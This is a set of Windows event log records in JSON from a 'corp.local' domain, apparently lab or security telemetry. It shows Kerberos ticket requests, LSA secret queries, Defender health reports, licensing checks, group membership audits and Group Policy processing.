{"EventTime":"2021-10-02T18:56:17.278132+05:45","Hostname":"DC01.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":14337,"OpcodeValue":0,"RecordNumber":190902187,"ExecutionProcessID":512,"ExecutionThreadID":3308,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tIT03$@corp.local\r\n\tAccount Domain:\t\tcorp.local\r\n\tLogon GUID:\t\t{6D65E903-4F68-6C23-8C49-18DBA26D0AAD}\r\n\r\nService Information:\r\n\tService Name:\t\tIT03$\r\n\tService ID:\t\tS-1-5-21-2569713578-3403938347-3732993993-1140\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::ffff:192.168.2.108\r\n\tClient Port:\t\t10587\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"IT03$@corp.local","TargetDomainName":"corp.local","ServiceName":"IT03$","ServiceSid":"S-1-5-21-2569713578-3403938347-3732993993-1140","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::ffff:192.168.2.108","IpPort":"10587","Status":"0x0","LogonGuid":"{6D65E903-4F68-6C23-8C49-18DBA26D0AAD}","TransmittedServices":"-","EventReceivedTime":"2021-10-02T18:56:19.012510+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T18:49:13.301811+05:45","Hostname":"IT03.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4662,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":12804,"OpcodeValue":0,"RecordNumber":40730118,"ExecutionProcessID":632,"ExecutionThreadID":1460,"Channel":"Security","Message":"An operation was performed on an object.\r\n\r\nSubject :\r\n\tSecurity ID:\t\tS-1-5-19\r\n\tAccount Name:\t\tLOCAL SERVICE\r\n\tAccount Domain:\t\tNT AUTHORITY\r\n\tLogon ID:\t\t0x3E5\r\n\r\nObject:\r\n\tObject Server:\t\tLSA\r\n\tObject Type:\t\tSecretObject\r\n\tObject Name:\t\tPolicy\\Secrets\\$MACHINE.ACC\r\n\tHandle ID:\t\t0x204943ce240\r\n\r\nOperation:\r\n\tOperation Type:\t\tQuery\r\n\tAccesses:\t\tQuery secret value\r\n\t\t\t\t\r\n\tAccess Mask:\t\t0x2\r\n\tProperties:\t\t-\r\n\r\nAdditional Information:\r\n\tParameter 1:\t\t-\r\n\tParameter 2:\t\t-","Category":"Other Object Access Events","Opcode":"Info","SubjectUserSid":"S-1-5-19","SubjectUserName":"LOCAL SERVICE","SubjectDomainName":"NT AUTHORITY","SubjectLogonId":"0x3e5","ObjectServer":"LSA","ObjectType":"SecretObject","ObjectName":"Policy\\Secrets\\$MACHINE.ACC","OperationType":"Query","HandleId":"0x204943ce240","AccessList":"%%5649\r\n\t\t\t\t","AccessMask":"0x2","Properties":"-","AdditionalInfo":"-","AdditionalInfo2":"-","EventReceivedTime":"2021-10-02T18:49:14.787112+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T18:44:27.643861+05:45","Hostname":"IT02.corp.local","Keywords":"9223372036854775808","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1151,"SourceName":"Microsoft-Windows-Windows Defender","ProviderGuid":"{11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":22735,"ExecutionProcessID":2080,"ExecutionThreadID":6860,"Channel":"Microsoft-Windows-Windows Defender/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Endpoint Protection client health report (time in UTC):\r\n \tPlatform version: 4.18.2108.7\r\n \tEngine version: 1.1.18500.10\r\n \tNetwork Realtime Inspection engine version: 1.1.18500.10\r\n \tAntivirus security intelligence version: 1.349.1764.0\r\n \tAntispyware security intelligence version: 1.349.1764.0\r\n \tNetwork Realtime Inspection security intelligence version: 1.349.1764.0\r\n \tRTP state: Enabled\r\n \tOA state: Enabled\r\n \tIOAV state: Enabled\r\n \tBM state: Enabled\r\n \tAntivirus security intelligence age: 0\r\n \tAntispyware security intelligence age: 0\r\n \tLast quick scan age: 3\r\n \tLast full scan age: 368\r\n \tAntivirus security intelligence creation time: 10/1/2021 1:43:02 PM\r\n \tAntispyware security intelligence creation time: 10/1/2021 1:43:03 PM\r\n \tLast quick scan start time: 9/29/2021 5:43:24 AM\r\n \tLast quick scan end time: 9/29/2021 5:49:27 AM\r\n \tLast quick scan source: 2\r\n \tLast full scan start time: 9/28/2020 2:02:02 PM\r\n \tLast full scan end time: 9/28/2020 3:29:41 PM\r\n \tLast full scan source: 1\r\n \tProduct status: 0x00080000\r\n","Opcode":"Info","Product Name":"Microsoft Defender Antivirus","Platform version":"4.18.2108.7","Engine version":"1.1.18500.10","NRI engine version":"1.1.18500.10","AV security intelligence version":"1.349.1764.0","AS security intelligence version":"1.349.1764.0","NRI security intelligence version":"1.349.1764.0","RTP state":"Enabled","OA state":"Enabled","IOAV state":"Enabled","BM state":"Enabled","Last AV security intelligence age":"0","Last AS security intelligence age":"0","Last quick scan age":"3","Last full scan age":"368","AV security intelligence creation time":"10/1/2021 1:43:02 PM","AS security intelligence creation time":"10/1/2021 1:43:03 PM","Last quick scan start time":"9/29/2021 5:43:24 AM","Last quick scan end time":"9/29/2021 5:49:27 AM","Last quick scan source":"2","Last full scan start time":"9/28/2020 2:02:02 PM","Last full scan end time":"9/28/2020 3:29:41 PM","Last full scan source":"1","Product status":"0x00080000","EventReceivedTime":"2021-10-02T18:44:28.990227+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T18:15:18.533785+05:45","Hostname":"IT01.corp.local","Keywords":"9223372036854775808","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1150,"SourceName":"Microsoft-Windows-Windows Defender","ProviderGuid":"{11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":16503,"ExecutionProcessID":2508,"ExecutionThreadID":2252,"Channel":"Microsoft-Windows-Windows Defender/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Endpoint Protection client is up and running in a healthy state.\r\n \tPlatform version: 4.18.2108.7\r\n \tEngine version: 1.1.18500.10\r\n \tSecurity intelligence version: 1.349.1764.0\r\n","Opcode":"Info","Product Name":"Microsoft Defender Antivirus","Platform version":"4.18.2108.7","Engine version":"1.1.18500.10","Security intelligence version":"1.349.1764.0","EventReceivedTime":"2021-10-02T18:15:20.179273+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T18:16:28.000000+05:45","Hostname":"DC01.corp.local","Keywords":"36028797018963968","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":900,"SourceName":"Microsoft-Windows-Security-SPP","ProviderGuid":"{E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":120549,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"Application","Message":"The Software Protection service is starting.\r\nParameters:trigger=timer;sessionid=0","EventData":"<Data>trigger=timer;sessionid=0</Data>","EventReceivedTime":"2021-10-02T18:16:28.480764+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T18:16:58.000000+05:45","Hostname":"DC01.corp.local","Keywords":"36028797018963968","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1003,"SourceName":"Microsoft-Windows-Security-SPP","ProviderGuid":"{E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":120553,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"Application","Message":"The Software Protection service has completed licensing status check.\r\nApplication Id=55c92734-d682-4d71-983e-d6ec3f16059f\r\nLicensing Status=\n1: 00091344-1ea4-4f37-b789-01750ba6988c, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )]\n2: 1226e046-263d-414c-824f-0d4f458cee3a, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )]\n3: 1cc95b8e-1b6e-42cc-9768-9e84ce28cc3f, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )]\n4: 640e7014-6f45-4106-bd1d-ac17a812a2d1, 1, 1 [(0 [0xC004E003, 0, 0], [( 2 0xC004FD01 0 0 msft:rm/algorithm/inherited/1.0 0x00000000 0)( 1 0x00000000)(?)( 2 0xC004FD01 0 0 msft:rm/algorithm/inherited/1.0 0x00000000 0)(?)(?)(?)(?)])(1 )(2 [0x00000000, 0, 0], [( 6 0xC004F009 0 0)( 1 0x00000000)( 6 0xC004F009 0 0)(?)(?)(?)( 10 0x00000000 msft:rm/algorithm/flags/1.0)( 11 0x00000000 0xC004FD01)])]\n5: 641f81b2-63c2-47dd-aba7-c24bf651ff85, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )]\n6: 66d129b6-eae9-414e-a39a-ea5b8be961cc, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )]\n7: acf1b4fd-1c55-4f2d-a60b-415ac958ad88, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )]\n8: c2d61e88-5598-4e77-aae2-286dc6670a89, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )]\n9: dcb88f6f-b090-405b-850e-dabcccf3693f, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )]\n10: fecbc8f2-a4b1-402a-92e7-5d81a6fe3e80, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )]\n11: 9d0bb49b-21a1-4354-9981-ec5dd9393961, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )]\n\n","EventData":"<Data>55c92734-d682-4d71-983e-d6ec3f16059f</Data><Data>\n1: 00091344-1ea4-4f37-b789-01750ba6988c, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )]\n2: 1226e046-263d-414c-824f-0d4f458cee3a, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )]\n3: 1cc95b8e-1b6e-42cc-9768-9e84ce28cc3f, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )]\n4: 640e7014-6f45-4106-bd1d-ac17a812a2d1, 1, 1 [(0 [0xC004E003, 0, 0], [( 2 0xC004FD01 0 0 msft:rm/algorithm/inherited/1.0 0x00000000 0)( 1 0x00000000)(?)( 2 0xC004FD01 0 0 msft:rm/algorithm/inherited/1.0 0x00000000 0)(?)(?)(?)(?)])(1 )(2 [0x00000000, 0, 0], [( 6 0xC004F009 0 0)( 1 0x00000000)( 6 0xC004F009 0 0)(?)(?)(?)( 10 0x00000000 msft:rm/algorithm/flags/1.0)( 11 0x00000000 0xC004FD01)])]\n5: 641f81b2-63c2-47dd-aba7-c24bf651ff85, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )]\n6: 66d129b6-eae9-414e-a39a-ea5b8be961cc, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )]\n7: acf1b4fd-1c55-4f2d-a60b-415ac958ad88, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )]\n8: c2d61e88-5598-4e77-aae2-286dc6670a89, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )]\n9: dcb88f6f-b090-405b-850e-dabcccf3693f, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )]\n10: fecbc8f2-a4b1-402a-92e7-5d81a6fe3e80, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )]\n11: 9d0bb49b-21a1-4354-9981-ec5dd9393961, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )]\n\n</Data>","EventReceivedTime":"2021-10-02T18:16:58.884297+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T18:16:30.000000+05:45","Hostname":"DC01.corp.local","Keywords":"36028797018963968","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1066,"SourceName":"Microsoft-Windows-Security-SPP","ProviderGuid":"{E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":120550,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"Application","Message":"Initialization status for service objects.\r\nC:\\Windows\\system32\\sppwinob.dll, msft:spp/windowsfunctionality/agent/7.0, 0x00000000, 0x00000000\nC:\\Windows\\system32\\sppobjs.dll, msft:rm/algorithm/inherited/1.0, 0x00000000, 0x00000000\nC:\\Windows\\system32\\sppobjs.dll, msft:rm/algorithm/phone/1.0, 0x00000000, 0x00000000\nC:\\Windows\\system32\\sppobjs.dll, msft:rm/algorithm/pkey/detect, 0x00000000, 0x00000000\nC:\\Windows\\system32\\sppobjs.dll, msft:spp/ActionScheduler/1.0, 0x00000000, 0x00000000\nC:\\Windows\\system32\\sppobjs.dll, msft:spp/TaskScheduler/1.0, 0x00000000, 0x00000000\nC:\\Windows\\system32\\sppobjs.dll, msft:spp/statecollector/pkey, 0x00000000, 0x00000000\nC:\\Windows\\system32\\sppobjs.dll, msft:spp/volume/services/kms/1.0, 0x00000000, 0x00000000\nC:\\Windows\\system32\\sppobjs.dll, msft:spp/volume/services/kms/activationinfo/1.0, 0x00000000, 0x00000000\n","EventData":"<Data>C:\\Windows\\system32\\sppwinob.dll, msft:spp/windowsfunctionality/agent/7.0, 0x00000000, 0x00000000\nC:\\Windows\\system32\\sppobjs.dll, msft:rm/algorithm/inherited/1.0, 0x00000000, 0x00000000\nC:\\Windows\\system32\\sppobjs.dll, msft:rm/algorithm/phone/1.0, 0x00000000, 0x00000000\nC:\\Windows\\system32\\sppobjs.dll, msft:rm/algorithm/pkey/detect, 0x00000000, 0x00000000\nC:\\Windows\\system32\\sppobjs.dll, msft:spp/ActionScheduler/1.0, 0x00000000, 0x00000000\nC:\\Windows\\system32\\sppobjs.dll, msft:spp/TaskScheduler/1.0, 0x00000000, 0x00000000\nC:\\Windows\\system32\\sppobjs.dll, msft:spp/statecollector/pkey, 0x00000000, 0x00000000\nC:\\Windows\\system32\\sppobjs.dll, msft:spp/volume/services/kms/1.0, 0x00000000, 0x00000000\nC:\\Windows\\system32\\sppobjs.dll, msft:spp/volume/services/kms/activationinfo/1.0, 0x00000000, 0x00000000\n</Data>","EventReceivedTime":"2021-10-02T18:16:30.511537+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T18:16:58.000000+05:45","Hostname":"DC01.corp.local","Keywords":"36028797018963968","EventType":"ERROR","SeverityValue":4,"Severity":"ERROR","EventID":8198,"SourceName":"Microsoft-Windows-Security-SPP","ProviderGuid":"{E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":120554,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"Application","Message":"License Activation (slui.exe) failed with the following error code:\r\nhr=0xC004FD01\r\nCommand-line arguments:\r\nRuleId=a5b3220c-2d48-42e8-9733-0374090e4a25;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=640e7014-6f45-4106-bd1d-ac17a812a2d1;NotificationInterval=120;Trigger=TimerEvent","EventData":"<Data>hr=0xC004FD01</Data><Data>RuleId=a5b3220c-2d48-42e8-9733-0374090e4a25;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=640e7014-6f45-4106-bd1d-ac17a812a2d1;NotificationInterval=120;Trigger=TimerEvent</Data>","EventReceivedTime":"2021-10-02T18:16:58.884297+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T18:17:28.000000+05:45","Hostname":"DC01.corp.local","Keywords":"36028797018963968","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":903,"SourceName":"Microsoft-Windows-Security-SPP","ProviderGuid":"{E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":120556,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"Application","Message":"The Software Protection service has stopped.\r\n","EventData":"","EventReceivedTime":"2021-10-02T18:17:29.180767+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T18:38:47.190773+05:45","Hostname":"IT03","Keywords":"36028797018963968","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":16384,"SourceName":"Microsoft-Windows-Security-SPP","ProviderGuid":"{E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":30309,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"Application","Message":"Successfully scheduled Software Protection service for re-start at 2021-12-24T04:52:47Z. Reason: RulesEngine.","EventData":"<Data>2021-12-24T04:52:47Z</Data><Data>RulesEngine</Data>","EventReceivedTime":"2021-10-02T18:38:47.646929+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T18:17:28.633827+05:45","Hostname":"DC01.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4985,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":12800,"OpcodeValue":0,"RecordNumber":190901618,"ExecutionProcessID":4,"ExecutionThreadID":2072,"Channel":"Security","Message":"The state of a transaction has changed.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tDC01$\r\n\tAccount Domain:\t\tCORP\r\n\tLogon ID:\t\t0x3E4\r\n\r\nTransaction Information:\r\n\tRM Transaction ID:\t{B15BDFD3-22EF-11EC-8113-000C29E1A995}\r\n\tNew State:\t\t48\r\n\tResource Manager:\t{C5A4AB64-1566-11EA-8E95-C4E8ECDC585D}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x390\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe","Category":"File System","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"DC01$","SubjectDomainName":"CORP","SubjectLogonId":"0x3e4","TransactionId":"{B15BDFD3-22EF-11EC-8113-000C29E1A995}","NewState":"48","ResourceManager":"{C5A4AB64-1566-11EA-8E95-C4E8ECDC585D}","ProcessId":"0x390","ProcessName":"C:\\Windows\\System32\\svchost.exe","EventReceivedTime":"2021-10-02T18:17:30.196370+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T18:38:16.784396+05:45","Hostname":"IT03","Keywords":"36028797018963968","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":16394,"SourceName":"Microsoft-Windows-Security-SPP","ProviderGuid":"{E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":30308,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"Application","Message":"Offline downlevel migration succeeded.","EventData":"","EventReceivedTime":"2021-10-02T18:38:17.487732+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T18:59:54.910888+05:45","Hostname":"IT02.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4627,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":12554,"OpcodeValue":0,"RecordNumber":18995517,"ActivityID":"{7870D080-A924-0001-B9D0-707824A9D701}","ExecutionProcessID":724,"ExecutionThreadID":4224,"Channel":"Security","Message":"Group membership information.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Type:\t\t\t3\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tIT02$\r\n\tAccount Domain:\t\tcorp.local\r\n\tLogon ID:\t\t0x53A30F62\r\n\r\nEvent in sequence:\t\t1 of 1\r\n\r\nGroup Membership:\t\t\t\r\n\t\t%{S-1-5-32-544}\r\n\t\t%{S-1-1-0}\r\n\t\t%{S-1-5-32-545}\r\n\t\t%{S-1-5-2}\r\n\t\t%{S-1-5-11}\r\n\t\t%{S-1-5-15}\r\n\t\t%{S-1-5-21-2569713578-3403938347-3732993993-2102}\r\n\t\t%{S-1-5-21-2569713578-3403938347-3732993993-515}\r\n\t\t%{S-1-18-1}\r\n\t\t%{S-1-16-16384}\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThis event is generated when the Audit Group Membership subcategory is configured.  The Logon ID field can be used to correlate this event with the corresponding user logon event as well as to any other security audit events generated during this logon session.","Category":"Group Membership","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"IT02$","TargetDomainName":"corp.local","TargetLogonId":"0x53a30f62","LogonType":"3","EventIdx":"1","EventCountTotal":"1","GroupMembership":"\n\t\t%{S-1-5-32-544}\n\t\t%{S-1-1-0}\n\t\t%{S-1-5-32-545}\n\t\t%{S-1-5-2}\n\t\t%{S-1-5-11}\n\t\t%{S-1-5-15}\n\t\t%{S-1-5-21-2569713578-3403938347-3732993993-2102}\n\t\t%{S-1-5-21-2569713578-3403938347-3732993993-515}\n\t\t%{S-1-18-1}\n\t\t%{S-1-16-16384}","EventReceivedTime":"2021-10-02T18:59:56.913085+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T18:41:40.074596+05:45","Hostname":"ACC01.prod.corp.local","Keywords":"36028797018963968","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1001,"SourceName":"Windows Error Reporting","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":161752,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"Application","Message":"Fault bucket , type 0\r\nEvent Name: StoreAgentScanForUpdatesFailure0\r\nResponse: Not available\r\nCab Id: 0\r\n\r\nProblem signature:\r\nP1: Update;\r\nP2: 80072f8f\r\nP3: 19042\r\nP4: 685\r\nP5: Windows.Desktop\r\nP6: \r\nP7: \r\nP8: \r\nP9: \r\nP10: \r\n\r\nAttached files:\r\n\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\WER\\Temp\\WER2493.tmp.WERInternalMetadata.xml\r\n\r\nThese files may be available here:\r\n\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\NonCritical_Update;_89a4bf0b82c8e65905826d66248b275798ae419_00000000_a1f856a3-9fe5-463e-baf4-3f2a2e2c7514\r\n\r\nAnalysis symbol: \r\nRechecking for solution: 0\r\nReport Id: a1f856a3-9fe5-463e-baf4-3f2a2e2c7514\r\nReport Status: 524388\r\nHashed bucket: \r\nCab Guid: 0","Opcode":"Info","Data":"0","Data_1":"StoreAgentScanForUpdatesFailure0","Data_2":"Not available","Data_3":"0","Data_4":"Update;","Data_5":"80072f8f","Data_6":"19042","Data_7":"685","Data_8":"Windows.Desktop","Data_9":"\n\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\WER\\Temp\\WER2493.tmp.WERInternalMetadata.xml","Data_10":"\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\NonCritical_Update;_89a4bf0b82c8e65905826d66248b275798ae419_00000000_a1f856a3-9fe5-463e-baf4-3f2a2e2c7514","Data_11":"0","Data_12":"a1f856a3-9fe5-463e-baf4-3f2a2e2c7514","Data_13":"524388","Data_14":"0","EventReceivedTime":"2021-10-02T18:41:40.293333+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T18:59:56.732971+05:45","Hostname":"IT02.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4735,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":13826,"OpcodeValue":0,"RecordNumber":18995519,"ActivityID":"{7870D080-A924-0001-B9D0-707824A9D701}","ExecutionProcessID":724,"ExecutionThreadID":6812,"Channel":"Security","Message":"A security-enabled local group was changed.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tIT02$\r\n\tAccount Domain:\t\tCORP\r\n\tLogon ID:\t\t0x3E7\r\n\r\nGroup:\r\n\tSecurity ID:\t\tS-1-5-32-544\r\n\tGroup Name:\t\tAdministrators\r\n\tGroup Domain:\t\tBuiltin\r\n\r\nChanged Attributes:\r\n\tSAM Account Name:\t-\r\n\tSID History:\t\t-\r\n\r\nAdditional Information:\r\n\tPrivileges:\t\t-","Category":"Security Group Management","Opcode":"Info","TargetUserName":"Administrators","TargetDomainName":"Builtin","TargetSid":"S-1-5-32-544","SubjectUserSid":"S-1-5-18","SubjectUserName":"IT02$","SubjectDomainName":"CORP","SubjectLogonId":"0x3e7","PrivilegeList":"-","SamAccountName":"-","SidHistory":"-","EventReceivedTime":"2021-10-02T18:59:58.024952+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T18:59:57.420599+05:45","Hostname":"IT02.corp.local","Keywords":"9223372036854775808","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1500,"SourceName":"Microsoft-Windows-GroupPolicy","ProviderGuid":"{AEA1B4FA-97D1-45F2-A64C-4D69FFFD92C9}","Version":0,"TaskValue":0,"OpcodeValue":1,"RecordNumber":82792,"ActivityID":"{EA13959B-F208-4396-8C6D-FAA8FE827CF8}","ExecutionProcessID":4688,"ExecutionThreadID":9024,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"The Group Policy settings for the computer were processed successfully. There were no changes detected since the last successful processing of Group Policy.","Opcode":"Start","SupportInfo1":"1","SupportInfo2":"4292","ProcessingMode":"0","ProcessingTimeInMilliseconds":"3047","DCName":"\\\\DC01.corp.local","EventReceivedTime":"2021-10-02T18:59:59.046195+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T17:00:58.262835+05:45","Hostname":"IT02.corp.local","Keywords":"36028797018963968","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1704,"SourceName":"SceCli","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":70112,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"Application","Message":"Security policy in the Group policy objects has been applied successfully.","EventReceivedTime":"2021-10-02T17:00:58.790833+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
